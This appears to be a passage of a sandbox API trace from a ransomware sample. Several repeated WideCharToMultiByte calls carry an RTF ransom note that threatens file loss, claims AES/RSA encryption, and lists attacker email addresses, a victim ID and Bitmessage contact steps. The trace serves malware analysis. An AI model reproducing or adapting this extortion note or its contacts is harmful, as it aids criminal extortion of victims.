yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.067] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.067] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 